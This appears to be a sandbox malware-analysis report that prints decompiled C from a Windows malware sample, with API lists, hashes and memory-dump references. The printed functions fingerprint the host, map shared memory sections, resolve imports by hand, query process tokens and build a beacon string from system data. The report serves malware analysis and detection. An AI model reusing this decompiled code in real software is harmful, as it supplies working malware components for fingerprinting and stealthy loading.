                        • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                        • String ID:
                        • API String ID: 1967744295-0
                        • Opcode ID: 8b5adbf75345ece0e46a5f9ebd229b59926c8b5f26d0f3e7eaa3ddf47e57492d
                        • Instruction ID: af5197228b3e3954ce084e67a8be27f113228b4092f2bd5ba7ebd2d3397f8863
                        • Opcode Fuzzy Hash: 8b5adbf75345ece0e46a5f9ebd229b59926c8b5f26d0f3e7eaa3ddf47e57492d
                        • Instruction Fuzzy Hash: 9F514AB1900209FFDB10DFA9DC88AAEBFBDFB54340F108425F905E6290D7319E589B61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 97%
                        			E00503946(char __eax, signed int* __esi) {
                        				long _v8;
                        				char _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v28;
                        				long _t34;
                        				signed int _t39;
                        				intOrPtr _t50;
                        				char _t59;
                        				intOrPtr _t61;
                        				void* _t62;
                        				void* _t63;
                        				signed int* _t64;
                        				char _t65;
                        				intOrPtr* _t67;
                        				void* _t68;
                        				signed int* _t69;
                        
                        				_t69 = __esi;
                        				_t65 = __eax;
                        				_v8 = 0;
                        				_v12 = __eax;
                        				if(__eax == 0) {
                        					_t59 =  *0x50a2c8; // 0xbd092303
                        					_v12 = _t59;
                        				}
                        				_t64 = _t69;
                        				E0050354E( &_v12, _t64);
                        				if(_t65 != 0) {
                        					 *_t69 =  *_t69 ^  *0x50a2cc ^ 0x4c0ca0ae;
                        				} else {
                        					_t5 =  &_v8; // 0x502f3f
                        					GetUserNameW(0, _t5);
                        					_t6 =  &_v8; // 0x502f3f
                        					_t50 =  *_t6;
                        					if(_t50 != 0) {
                        						_t62 = RtlAllocateHeap( *0x50a290, 0, _t50 + _t50);
                        						if(_t62 != 0) {
                        							_t7 =  &_v8; // 0x502f3f
                        							if(GetUserNameW(_t62, _t7) != 0) {
                        								_t8 =  &_v8; // 0x502f3f
                        								_t63 = _t62;
                        								 *_t69 =  *_t69 ^ E00503F12( *_t8 +  *_t8, _t63);
                        							}
                        							HeapFree( *0x50a290, 0, _t62);
                        						}
                        					}
                        				}
                        				_t61 = __imp__;
                        				_v8 = _v8 & 0x00000000;
                        				GetComputerNameW(0,  &_v8);
                        				_t34 = _v8;
                        				if(_t34 != 0) {
                        					_t68 = RtlAllocateHeap( *0x50a290, 0, _t34 + _t34);
                        					if(_t68 != 0) {
                        						if(GetComputerNameW(_t68,  &_v8) != 0) {
                        							_t63 = _t68;
                        							_t69[3] = _t69[3] ^ E00503F12(_v8 + _v8, _t63);
                        						}
                        						HeapFree( *0x50a290, 0, _t68);
                        					}
                        				}
                        				asm("cpuid");
                        				_t67 =  &_v28;
                        				 *_t67 = 1;
                        				 *((intOrPtr*)(_t67 + 4)) = _t61;
                        				 *(_t67 + 8) = _t63;
                        				 *(_t67 + 0xc) = _t64;
                        				_t39 = _v16 ^ _v20 ^ _v28;
                        				_t69[1] = _t69[1] ^ _t39;
                        				return _t39;
                        			}

                        APIs
                        • GetUserNameW.ADVAPI32(00000000,?/P), ref: 0050397D
                        • RtlAllocateHeap.NTDLL(00000000,?/P), ref: 00503994
                        • GetUserNameW.ADVAPI32(00000000,?/P), ref: 005039A1
                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00502F3F,?,?,?,?,?,005044F9,?,00000001), ref: 005039C2
                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 005039E9
                        • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 005039FD
                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 00503A0A
                        • HeapFree.KERNEL32(00000000,00000000), ref: 00503A28
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: HeapName$AllocateComputerFreeUser
                        • String ID: ?/P$?/P
                        • API String ID: 3239747167-1958642096
                        • Opcode ID: 61f7706712a476ae973174f03e2d9bbd9767eee81f20788634e556021b0624ea
                        • Instruction ID: 1ac15ff0d049d2cc42d5312ebd0a22343fed731b5d79f2296ae084492361bca2
                        • Opcode Fuzzy Hash: 61f7706712a476ae973174f03e2d9bbd9767eee81f20788634e556021b0624ea
                        • Instruction Fuzzy Hash: EB314B75A0020AEFDB11DFA9DC85A6EBBFDFB58300F508429E545D3261D770EE04AB10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAlloc.KERNELBASE(00000000,0000093A,00003000,00000040,0000093A,6C55EC40), ref: 6C55F2A4
                        • VirtualAlloc.KERNEL32(00000000,00000171,00003000,00000040,6C55ECA0), ref: 6C55F2DB
                        • VirtualAlloc.KERNEL32(00000000,0000E816,00003000,00000040), ref: 6C55F33B
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6C55F371
                        • VirtualProtect.KERNEL32(6C500000,00000000,00000004,6C55F1C6), ref: 6C55F476
                        • VirtualProtect.KERNEL32(6C500000,00001000,00000004,6C55F1C6), ref: 6C55F49D
                        • VirtualProtect.KERNEL32(00000000,?,00000002,6C55F1C6), ref: 6C55F56A
                        • VirtualProtect.KERNEL32(00000000,?,00000002,6C55F1C6,?), ref: 6C55F5C0
                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6C55F5DC
                        Memory Dump Source
                        • Source File: 00000000.00000002.918341548.000000006C55E000.00000040.00020000.sdmp, Offset: 6C55E000, based on PE: false
                        Similarity
                        • API ID: Virtual$Protect$Alloc$Free
                        • String ID:
                        • API String ID: 2574235972-0
                        • Opcode ID: 002b6e9d8b8b912e427009376430405a75685ee57e1abf73e049f3572918e976
                        • Instruction ID: 4ecd6859f635121903e48babe34bada4519fc3171799d4d3917332ba8c4ad7a9
                        • Opcode Fuzzy Hash: 002b6e9d8b8b912e427009376430405a75685ee57e1abf73e049f3572918e976
                        • Instruction Fuzzy Hash: 69D18076500100DFDB02CF14CCA0B5277B6FF88314B194599ED09DFB9AE771A86ACBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E6C501979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                        				intOrPtr _v12;
                        				struct _FILETIME* _v16;
                        				short _v60;
                        				struct _FILETIME* _t14;
                        				intOrPtr _t15;
                        				long _t18;
                        				void* _t19;
                        				void* _t22;
                        				intOrPtr _t31;
                        				long _t32;
                        				void* _t34;
                        
                        				_t31 = __edx;
                        				_t14 =  &_v16;
                        				GetSystemTimeAsFileTime(_t14);
                        				_push(0x192);
                        				_push(0x54d38000);
                        				_push(_v12);
                        				_push(_v16);
                        				L6C502210();
                        				_push(_t14);
                        				_v16 = _t14;
                        				_t15 =  *0x6c5041d0;
                        				_push(_t15 + 0x6c50505e);
                        				_push(_t15 + 0x6c505054);
                        				_push(0x16);
                        				_push( &_v60);
                        				_v12 = _t31;
                        				L6C50220A();
                        				_t18 = _a4;
                        				if(_t18 == 0) {
                        					_t18 = 0x1000;
                        				}
                        				_t19 = CreateFileMappingW(0xffffffff, 0x6c5041c0, 4, 0, _t18,  &_v60); // executed
                        				_t34 = _t19;
                        				if(_t34 == 0) {
                        					_t32 = GetLastError();
                        				} else {
                        					if(_a4 != 0 || GetLastError() == 0xb7) {
                        						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                        						if(_t22 == 0) {
                        							_t32 = GetLastError();
                        							if(_t32 != 0) {
                        								goto L9;
                        							}
                        						} else {
                        							 *_a8 = _t34;
                        							 *_a12 = _t22;
                        							_t32 = 0;
                        						}
                        					} else {
                        						_t32 = 2;
                        						L9:
                        						CloseHandle(_t34);
                        					}
                        				}
                        				return _t32;
                        			}

                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6C50176E,0000000A,?,?), ref: 6C501986
                        • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6C50199C
                        • _snwprintf.NTDLL ref: 6C5019C1
                        • CreateFileMappingW.KERNELBASE(000000FF,6C5041C0,00000004,00000000,?,?), ref: 6C5019E6
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C50176E,0000000A,?), ref: 6C5019FD
                        • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 6C501A11
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C50176E,0000000A,?), ref: 6C501A29
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C50176E,0000000A), ref: 6C501A32
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C50176E,0000000A,?), ref: 6C501A3A
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                        • String ID:
                        • API String ID: 1724014008-0
                        • Opcode ID: 92fc2cd8ce0867b35f40f40d45fc675ff2403b420c9073428821fba8a17719cf
                        • Instruction ID: 9cd8e2457fb2ed31a74fb831bc923424d3701bc983a03dc0d6f5690a96a0bb89
                        • Opcode Fuzzy Hash: 92fc2cd8ce0867b35f40f40d45fc675ff2403b420c9073428821fba8a17719cf
                        • Instruction Fuzzy Hash: E321ACB2701108FFDB11AFA9CC85E9F77BCEB89358F114429FA11D7580D73099448BA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 38%
                        			E00503CA1(char _a4, void* _a8) {
                        				void* _v8;
                        				void* _v12;
                        				char _v16;
                        				void* _v20;
                        				char _v24;
                        				char _v28;
                        				char _v32;
                        				char _v36;
                        				char _v40;
                        				void* _v44;
                        				void** _t33;
                        				void* _t40;
                        				void* _t43;
                        				void** _t44;
                        				intOrPtr* _t47;
                        				char _t48;
                        
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				_v20 = _a4;
                        				_t48 = 0;
                        				_v16 = 0;
                        				_a4 = 0;
                        				_v44 = 0x18;
                        				_v40 = 0;
                        				_v32 = 0;
                        				_v36 = 0;
                        				_v28 = 0;
                        				_v24 = 0;
                        				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                        					_t33 =  &_v8;
                        					__imp__(_v12, 8, _t33);
                        					if(_t33 >= 0) {
                        						_t47 = __imp__;
                        						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                        						_t44 = E00505C4E(_a4);
                        						if(_t44 != 0) {
                        							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                        							if(_t40 >= 0) {
                        								memcpy(_a8,  *_t44, 0x1c);
                        								_t48 = 1;
                        							}
                        							E00502A03(_t44);
                        						}
                        						NtClose(_v8); // executed
                        					}
                        					NtClose(_v12);
                        				}
                        				return _t48;
                        			}

                        APIs
                        • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00503CE8
                        • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 00503CFB
                        • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00503D17
                          • Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A
                        • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 00503D34
                        • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00503D41
                        • NtClose.NTDLL(00000000), ref: 00503D53
                        • NtClose.NTDLL(00000000), ref: 00503D5D
                        Memory Dump Source
                        • Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true
                        • Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp
                        • Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp
                        • Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp
                        Similarity
                        • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                        • String ID:
                        • API String ID: 2575439697-0
                        • Opcode ID: 845f04b17322f6bb38e189480556c33dd6b728c6fcc5e60dd80a99d29cd8b1a2
                        • Instruction ID: 2772470bcab70834bee2d353cadf8ba41e2a31c22e59cb3f623b7349fa7c2266
                        • Opcode Fuzzy Hash: 845f04b17322f6bb38e189480556c33dd6b728c6fcc5e60dd80a99d29cd8b1a2
                        • Instruction Fuzzy Hash: 7621E3B2A00219BBDB119FA5CC89ADEBFBDFB58780F104026F905E6160D7719A44DBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E6C5018D1(intOrPtr* __eax, void** _a4) {
                        				int _v12;
                        				void* _v16;
                        				void* _v20;
                        				void* _v24;
                        				int _v28;
                        				int _v32;
                        				intOrPtr _v36;
                        				int _v40;
                        				int _v44;
                        				void* _v48;
                        				void* __esi;
                        				long _t34;
                        				void* _t39;
                        				void* _t47;
                        				intOrPtr* _t48;
                        
                        				_t48 = __eax;
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				asm("stosd");
                        				_v24 =  *((intOrPtr*)(__eax + 4));
                        				_v16 = 0;
                        				_v12 = 0;
                        				_v48 = 0x18;
                        				_v44 = 0;
                        				_v36 = 0x40;
                        				_v40 = 0;
                        				_v32 = 0;
                        				_v28 = 0;
                        				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                        				if(_t34 < 0) {
                        					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                        				} else {
                        					 *_t48 = _v16;
                        					_t39 = E6C501B89(_t48,  &_v12); // executed
                        					_t47 = _t39;
                        					if(_t47 != 0) {
                        						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                        					} else {
                        						memset(_v12, 0, _v24);
                        						 *_a4 = _v12;
                        					}
                        				}
                        				return _t47;
                        			}

                        APIs
                        • NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 6C50192E
                          • Part of subcall function 6C501B89: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6C501943,00000002,00000000,?,?,00000000,?,?,6C501943,00000000), ref: 6C501BB6
                        • memset.NTDLL ref: 6C501950
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: Section$CreateViewmemset
                        • String ID: @
                        • API String ID: 2533685722-2766056989
                        • Opcode ID: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
                        • Instruction ID: bf1fe3ebbbd5acb3caec16d1d963839fbda3c3e31e948767fa7b5e366eef6aff
                        • Opcode Fuzzy Hash: 00af36b428359ca772932176b9c6d2f97bd417452e06b8a4b42cf2ee787d1e4b
                        • Instruction Fuzzy Hash: 89211F71E0020DAFDB01CFA9C8849DFFBB9EF48354F104869E505F7610D730AA448BA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E6C501566(void* __ecx) {
                        				char _v8;
                        				signed short _t7;
                        
                        				_v8 = _v8 & 0x00000000;
                        				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
                        				if(_t7 == 0) {
                        					__imp__GetSystemDefaultUILanguage();
                        					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                        				}
                        				return _v8;
                        			}

                        APIs
                        • GetLocaleInfoA.KERNELBASE(00000400,0000005A,00000000,00000004,?,?,6C501C5E,?,6C501810,?,00000000,00000000,?,?,?,6C501810), ref: 6C50157B
                        • GetSystemDefaultUILanguage.KERNEL32(?,?,6C501C5E,?,6C501810,?,00000000,00000000,?,?,?,6C501810), ref: 6C501585
                        • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6C501C5E,?,6C501810,?,00000000,00000000,?,?,?,6C501810), ref: 6C501598
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID: Language$DefaultInfoLocaleNameSystem
                        • String ID:
                        • API String ID: 3724080410-0
                        • Opcode ID: d56822503f85eaa0710f49b197ff7e2562f70cc349a5d699beb7d6c144217cb0
                        • Instruction ID: a0591ab78e7052fee4d346b482e5a6e1b601d22d8bc20f6981da6c2e2f6e2e17
                        • Opcode Fuzzy Hash: d56822503f85eaa0710f49b197ff7e2562f70cc349a5d699beb7d6c144217cb0
                        • Instruction Fuzzy Hash: 8CE04874740204F6E710D7919C06FBE727C970070EF500048F701D60C0D774DE049B2A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E6C501F31(void* __edi, intOrPtr _a4) {
                        				signed int _v8;
                        				intOrPtr* _v12;
                        				_Unknown_base(*)()** _v16;
                        				signed int _v20;
                        				signed short _v24;
                        				struct HINSTANCE__* _v28;
                        				intOrPtr _t43;
                        				intOrPtr* _t45;
                        				intOrPtr _t46;
                        				struct HINSTANCE__* _t47;
                        				intOrPtr* _t49;
                        				intOrPtr _t50;
                        				signed short _t51;
                        				_Unknown_base(*)()* _t53;
                        				CHAR* _t54;
                        				_Unknown_base(*)()* _t55;
                        				void* _t58;
                        				signed int _t59;
                        				_Unknown_base(*)()* _t60;
                        				intOrPtr _t61;
                        				intOrPtr _t65;
                        				signed int _t68;
                        				void* _t69;
                        				CHAR* _t71;
                        				signed short* _t73;
                        
                        				_t69 = __edi;
                        				_v20 = _v20 & 0x00000000;
                        				_t59 =  *0x6c5041cc;
                        				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
                        				if(_t43 != 0) {
                        					_t45 = _t43 + __edi;
                        					_v12 = _t45;
                        					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                        					if(_t46 != 0) {
                        						while(1) {
                        							_t71 = _t46 + _t69;
                        							_t47 = LoadLibraryA(_t71); // executed
                        							_v28 = _t47;
                        							if(_t47 == 0) {
                        								break;
                        							}
                        							_v24 = _v24 & 0x00000000;
                        							 *_t71 = _t59 - 0x63699bc3;
                        							_t49 = _v12;
                        							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                        							_t50 =  *_t49;
                        							if(_t50 != 0) {
                        								L6:
                        								_t73 = _t50 + _t69;
                        								_v16 = _t61 + _t69;
                        								while(1) {
                        									_t51 =  *_t73;
                        									if(_t51 == 0) {
                        										break;
                        									}
                        									if(__eflags < 0) {
                        										__eflags = _t51 - _t69;
                        										if(_t51 < _t69) {
                        											L12:
                        											_t21 =  &_v8;
                        											 *_t21 = _v8 & 0x00000000;
                        											__eflags =  *_t21;
                        											_v24 =  *_t73 & 0x0000ffff;
                        										} else {
                        											_t65 = _a4;
                        											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                        											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                        												goto L12;
                        											} else {
                        												goto L11;
                        											}
                        										}
                        									} else {
                        										_t51 = _t51 + _t69;
                        										L11:
                        										_v8 = _t51;
                        									}
                        									_t53 = _v8;
                        									__eflags = _t53;
                        									if(_t53 == 0) {
                        										_t54 = _v24 & 0x0000ffff;
                        									} else {
                        										_t54 = _t53 + 2;
                        									}
                        									_t55 = GetProcAddress(_v28, _t54);
                        									__eflags = _t55;
                        									if(__eflags == 0) {
                        										_v20 = _t59 - 0x63699b44;
                        									} else {
                        										_t68 = _v8;
                        										__eflags = _t68;
                        										if(_t68 != 0) {
                        											 *_t68 = _t59 - 0x63699bc3;
                        										}
                        										 *_v16 = _t55;
                        										_t58 = 0x725990f8 + _t59 * 4;
                        										_t73 = _t73 + _t58;
                        										_t32 =  &_v16;
                        										 *_t32 = _v16 + _t58;
                        										__eflags =  *_t32;
                        										continue;
                        									}
                        									goto L23;
                        								}
                        							} else {
                        								_t50 = _t61;
                        								if(_t61 != 0) {
                        									goto L6;
                        								}
                        							}
                        							L23:
                        							_v12 = _v12 + 0x14;
                        							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                        							if(_t46 != 0) {
                        								continue;
                        							} else {
                        							}
                        							L26:
                        							goto L27;
                        						}
                        						_t60 = _t59 + 0x9c9664bb;
                        						__eflags = _t60;
                        						_v20 = _t60;
                        						goto L26;
                        					}
                        				}
                        				L27:
                        				return _v20;
                        			}


                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6C501F69
                        • GetProcAddress.KERNEL32(?,00000000), ref: 6C501FDB
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: AddressLibraryLoadProc
                        • String ID:
                        • API String ID: 2574300362-0
                        • Opcode ID: b9ee672b3058f798a473ba3f64480fbdcb322578ad79d1e82d9a90a31176a8d4
                        • Instruction ID: bc5da30318488317f84c52bf62caf45ea35662ab1b505e46f36b61e7a4d9097d
                        • Opcode Fuzzy Hash: b9ee672b3058f798a473ba3f64480fbdcb322578ad79d1e82d9a90a31176a8d4
                        • Instruction Fuzzy Hash: CA313771B0120ADFDB14CF59CC94AAEB7F8BF45358F24456AD811E7640E770DA40CB62
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E6C501B89(void** __esi, PVOID* _a4) {
                        				long _v8;
                        				void* _v12;
                        				void* _v16;
                        				long _t13;
                        
                        				_v16 = 0;
                        				asm("stosd");
                        				_v8 = 0;
                        				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                        				if(_t13 < 0) {
                        					_push(_t13);
                        					return __esi[6]();
                        				}
                        				return 0;
                        			}


                        APIs
                        • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6C501943,00000002,00000000,?,?,00000000,?,?,6C501943,00000000), ref: 6C501BB6
                        Memory Dump Source
                        • Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true
                        • Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp
                        • Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp
                        • Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp
                        Similarity
                        • API ID: SectionView
                        • String ID:
                        • API String ID: 1323581903-0
                        • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                        • Instruction ID: e8c97859092bb10563eb2b7ffa8dc5bc960213d7e5480980f87b4110025dcee9
                        • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                        • Instruction Fuzzy Hash: E1F012B5A0020CFFEB119FA5CC85C9FBBFDEB44354B104979B552E10A0E6309E089B61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00506DB7(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                        				void* _v8;
                        				void* _v12;
                        				void* _v16;
                        				void* _v20;
                        				void* __ebx;
                        				void* __edi;
                        				long _t63;
                        				intOrPtr _t64;
                        				intOrPtr _t65;
                        				intOrPtr _t66;
                        				intOrPtr _t67;
                        				intOrPtr _t68;
                        				void* _t71;
                        				intOrPtr _t72;
                        				int _t75;
                        				void* _t76;
                        				intOrPtr _t77;
                        				intOrPtr _t81;
                        				intOrPtr _t85;
                        				intOrPtr _t86;
                        				void* _t88;
                        				void* _t91;
                        				intOrPtr _t95;
                        				intOrPtr _t99;
                        				intOrPtr* _t101;
                        				void* _t102;
                        				void* _t107;
                        				intOrPtr _t112;
                        				signed int _t116;
                        				char** _t118;
                        				int _t121;
                        				signed int _t123;
                        				intOrPtr* _t124;
                        				intOrPtr* _t126;
                        				intOrPtr* _t128;
                        				intOrPtr* _t130;
                        				intOrPtr _t133;
                        				intOrPtr _t136;
                        				int _t139;
                        				intOrPtr _t140;
                        				int _t143;
                        				void* _t144;
                        				void* _t145;
                        				void* _t155;
                        				int _t158;
                        				void* _t159;
                        				void* _t160;
                        				void* _t161;
                        				intOrPtr _t162;
                        				void* _t164;
                        				long _t168;
                        				intOrPtr* _t169;
                        				intOrPtr* _t172;
                        				void* _t173;
                        				void* _t175;
                        				void* _t176;
                        				void* _t181;
                        
                        				_t155 = __edx;
                        				_t145 = __ecx;
                        				_t63 = __eax;
                        				_t144 = _a20;
                        				_a20 = 8;
                        				if(__eax == 0) {
                        					_t63 = GetTickCount();
                        				}
                        				_t64 =  *0x50a018; // 0x5ffc1f8b
                        				asm("bswap eax");
                        				_t65 =  *0x50a014; // 0x5cb11ae7
                        				asm("bswap eax");
                        				_t66 =  *0x50a010; // 0x15dc9586
                        				asm("bswap eax");
                        				_t67 =  *0x50a00c; // 0x67522d90
                        				asm("bswap eax");
                        				_t68 =  *0x50a2d0; // 0x2add5a8
                        				_t3 = _t68 + 0x50b622; // 0x74666f73
                        				_t158 = wsprintfA(_t144, _t3, 3, 0x3d14c, _t67, _t66, _t65, _t64,  *0x50a02c,  *0x50a004, _t63);
                        				_t71 = E0050271A();
                        				_t72 =  *0x50a2d0; // 0x2add5a8
                        				_t4 = _t72 + 0x50b662; // 0x74707526
                        				_t75 = wsprintfA(_t158 + _t144, _t4, _t71);
                        				_t175 = _t173 + 0x38;
                        				_t159 = _t158 + _t75;
                        				if(_a8 != 0) {
                        					_t140 =  *0x50a2d0; // 0x2add5a8
                        					_t8 = _t140 + 0x50b66d; // 0x732526
                        					_t143 = wsprintfA(_t159 + _t144, _t8, _a8);
                        					_t175 = _t175 + 0xc;
                        					_t159 = _t159 + _t143;
                        				}
                        				_t76 = E00502956(_t145);
                        				_t77 =  *0x50a2d0; // 0x2add5a8
                        				_t10 = _t77 + 0x50b38a; // 0x6d697426
                        				_t160 = _t159 + wsprintfA(_t159 + _t144, _t10, _t76, _t155);
                        				_t81 =  *0x50a2d0; // 0x2add5a8
                        				_t12 = _t81 + 0x50b7b4; // 0x2fe8d5c
                        				_t181 = _a4 - _t12;
                        				_t14 = _t81 + 0x50b33b; // 0x74636126
                        				_t157 = 0 | _t181 == 0x00000000;
                        				_t161 = _t160 + wsprintfA(_t160 + _t144, _t14, _t181 == 0);
                        				_t85 =  *0x50a318; // 0x2fe95e0
                        				_t176 = _t175 + 0x1c;
                        				if(_t85 != 0) {
                        					_t136 =  *0x50a2d0; // 0x2add5a8
                        					_t18 = _t136 + 0x50b8ea; // 0x3d736f26
                        					_t139 = wsprintfA(_t161 + _t144, _t18, _t85);
                        					_t176 = _t176 + 0xc;
                        					_t161 = _t161 + _t139;
                        				}
                        				_t86 =  *0x50a328; // 0x2fe95b0
                        				if(_t86 != 0) {
                        					_t133 =  *0x50a2d0; // 0x2add5a8
                        					_t20 = _t133 + 0x50b685; // 0x73797326
                        					wsprintfA(_t161 + _t144, _t20, _t86);
                        					_t176 = _t176 + 0xc;
                        				}
                        				_t162 =  *0x50a37c; // 0x2fe9630
                        				_t88 = E00505741(0x50a00a, _t162 + 4);
                        				_t168 = 0;
                        				_v12 = _t88;
                        				if(_t88 == 0) {
                        					L28:
                        					RtlFreeHeap( *0x50a290, _t168, _t144); // executed
                        					return _a20;
                        				} else {
                        					_t91 = RtlAllocateHeap( *0x50a290, 0, 0x800);
                        					_a8 = _t91;
                        					if(_t91 == 0) {
                        						L27:
                        						HeapFree( *0x50a290, _t168, _v12);
                        						goto L28;
                        					}
                        					E00501A51(GetTickCount());
                        					_t95 =  *0x50a37c; // 0x2fe9630
                        					__imp__(_t95 + 0x40);
                        					asm("lock xadd [eax], ecx");
                        					_t99 =  *0x50a37c; // 0x2fe9630
